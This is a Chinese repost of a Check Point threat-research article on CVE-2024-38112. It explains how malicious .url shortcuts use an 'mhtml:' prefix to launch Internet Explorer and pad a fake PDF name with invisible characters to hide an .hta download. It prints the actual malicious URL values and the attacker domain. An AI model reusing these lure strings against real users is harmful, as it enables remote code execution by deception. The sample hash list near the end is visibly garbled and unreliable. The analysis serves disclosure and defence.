简介和背景
Check Point Research 最近发现,威胁行为者一直在使用新颖的(或以前未知的)技巧来引诱 Windows 用户进行远程代码执行。具体来说,攻击者使用特殊的 Windows Internet 快捷方式文件(.url 扩展名),单击该文件时会调用已退役的 Internet Explorer (IE) 来访问攻击者控制的 URL。在 IE 上还使用了另一种技巧来隐藏恶意的 .hta 扩展名。通过使用 IE 而不是 Windows 上更安全的现代 Chrome/Edge 浏览器打开 URL,攻击者在利用受害者的计算机方面获得了显著优势,尽管该计算机运行的是现代的 Windows 10/11 操作系统。
从技术背景来看, 威胁行为者使用 .url 文件作为初始攻击媒介的情况并不少见。甚至以前也发生过使用新型或零日 url 文件相关漏洞的情况——去年 11 月刚刚修补的CVE-2023-36025就是一个很好的例子。
我们发现的恶意 .url 样本最早可以追溯到 2023 年 1 月 (一年多前),最晚可以追溯到 2024 年 5 月 13 日 (截至撰写本文时,仅几天前)。这表明威胁行为者已经使用这些攻击技术一段时间了。
通过“mhtml”技巧复活 Internet Explorer
让我们使用 Virus Total 上的最新 .url样本作为示例来解释该技术。
样本内容:
图 1:恶意 .url 样本的内容
我们可以看到,.url 文件的最后几行字符串指向 Microsoft Edge 应用程序文件中的自定义图标msedge.exe。这会使它看起来指向 PDF 文件(但事实上并非如此)。
重要的是,我们可以看到,关键字的值URL与通常的值有很大不同 - 通常,对于常见的 .url 文件,参数URL看起来像URL=https://www.google.com指向 URL https://www.google.com。但在这个示例中,该值为:
mhtml:http: //cbmelipilla.cl/te/test1.html! x-usc:http://cbmelipilla.cl/te/test1.html
它使用了一个特殊的前缀mhtml:,并且!x-usc:中间还有一个。
几年前,我们在臭名昭著的 CVE-2021-40444 零日攻击中看到了同样的技巧(我们称之为“mhtml”技巧) ,其中文件document.xml.rels包含完全相同的字符串。
图2:CVE-2021-40444漏洞样本中的关键内容
我们知道,在利用 CVE-2021-40444 漏洞时,Word 文档中曾使用过“mhtml”技巧,现在我们看到在 .url 文件中也使用了相同的技巧。那么,攻击者可以利用这个技巧实现什么呢?让我们做一些测试。
如果我们将样本重命名为Books_A0UJKO.pdf.url(野外名称),.url 文件在(完全修补的)Windows 11 上将如下所示 - 显示为指向 PDF 文件的链接。
图 3:恶意 .url 文件在 Windows 11 上显示为 PDF 文件的链接
如果我们像受害者一样操作(我们想要打开 PDF),我们双击快捷方式文件。然后,受害者将得到以下内容:
图 4:受害者双击 .url 文件时,会出现 IE 和升级窗口对话框
看到有什么奇怪的地方了吗?Internet Explorer 打开了。事实上,通过一些调试技巧,我们能够确认 IE 确实被用来打开http://cbmelipilla[.]cl/te/test1.html.url 文件中指定的链接。
众所周知,微软几年前就宣布 IE 退役 。在典型的 Windows 10/11 上,正常的用户操作不应该能够打开 IE 来访问网站,因为它们不具备与现代浏览器相同的安全级别。IE 是一款过时的网络浏览器,以不安全而闻名——这是微软用现代且更安全的 Microsoft Edge 取代它的重要原因之一,或者用户只需安装并使用 Google 的 Chrome 浏览器即可。
免责声明:尽管 IE 已被宣布“退役并停止支持”,但从技术上讲,IE 仍然是 Windows 操作系统的一部分,并且“本质上并不不安全,因为 IE 仍然提供安全漏洞服务,并且应该没有已知的可利用的安全漏洞”,根据我们与微软的沟通。
因此,默认情况下,用户不应使用 IE 打开网站,除非用户明确要求并且用户完全知情。
然而,在这个示例中,使用“mhtml”技巧,当受害者打开 .url 快捷方式时(受害者认为他/她正在打开 PDF),攻击者控制的网站是使用 IE 打开的,而不是典型的 Chrome/Edge。
从那里(使用 IE 打开网站),攻击者可以做很多坏事,因为 IE 不安全且过时。例如,如果攻击者有一个 IE 零日漏洞(与 Chrome/Edge 相比更容易找到),攻击者可以攻击受害者以立即获得远程代码执行。然而,在我们分析的样本中,威胁行为者没有使用任何 IE 远程代码执行漏洞。相反,他们使用了 IE 中的另一个技巧(据我们所知,以前可能不为公众所知)来诱骗受害者获得远程代码执行。
额外的 IE 技巧 – 隐藏 .hta 扩展名
让我们再次回顾上图(下面突出显示)。根据显示的(IE)对话框,它似乎要求用户打开一个名为的 PDF 文件Books_A0UJKO.pdf。
图 5:仔细查看 IE 对话框 - 仅显示 PDF 文件名
然而,这是真实情况吗?你认为你打开的是 PDF 吗?
不是的。如果我们在上面的 IE 对话框中单击“打开”(默认选项),我们将得到另一个弹出的对话框(见下文)。这是由于 IE 的保护模式(相对较弱的浏览器沙盒)。
图 6:IE 保护模式警告对话框
如果受害者继续忽略警告(因为受害者认为他/她正在打开 PDF),受害者的机器最终将被黑客入侵——“打开”的文件实际上是正在下载和执行的恶意 .hta 文件。
如果我们仔细观察 HTTP 流量,我们会发现字符串末尾附加了许多不可打印的字符Books_A0UJKO.pdf。最后是 .hta 字符串——这是真正的(也是危险的)扩展名。
图 7:显示所访问完整 URI 的 HTTP 流量
这正是 IE 对话框不向用户显示 .hta 文件名的原因。真正的完整 URL 是:
https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E 2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80.hta
利用这种技巧,攻击者可以更成功地引诱受害者继续执行操作,而事实上受害者正在下载并执行危险的 .hta 应用程序。
相关恶意 .url 样本 ITW
BD710e5E5EF3AD872f3f067811706060A8a073c87045a06a86fb4a7F0E4EF0 B16ae5B7DFAF2A61214E2C993E29DCBD59D8C20E0fd0AF75B76DD9170E104 490839a60 f4907ab8f28dd9db425e1cfab2D48E89437EF218A6E94 BFD59ed369057c325E517B2BE505F42D6016A47E8BDCBCBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBECBCBECBECBECB ECBECBECBECBECBECBECBECBECBECBECBECBCBECBECBECBECBECBECBECBECBECBECBECBECBECbe690210A3087d46D 22ED84c2A952 5e8c6a825fb53f2f30621C5E6c68B1051432B1C5C625AE46F8C C9f5D96 EC809a75679EC3C7A61EAAF3AAFBBBBBBBBBBBBBBBBBBBBB
结论
从漏洞利用的角度总结一下这些攻击:这些活动中使用的第一种技术是“mhtml”技巧,它允许攻击者调用 IE,而不是更安全的 Chrome/Edge。第二种技术是 IE 技巧,让受害者相信他们正在打开 PDF 文件,而事实上,他们正在下载和执行一个危险的.hta应用程序。这些攻击的总体目标是让受害者相信他们正在打开 PDF 文件,而这可以通过使用这两种技巧来实现。
原文始发于微信公众号(Ots安全):威胁行为者利用 INTERNET 快捷方式文件中的零日漏洞诱骗受害者 (CVE-2024-38112)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论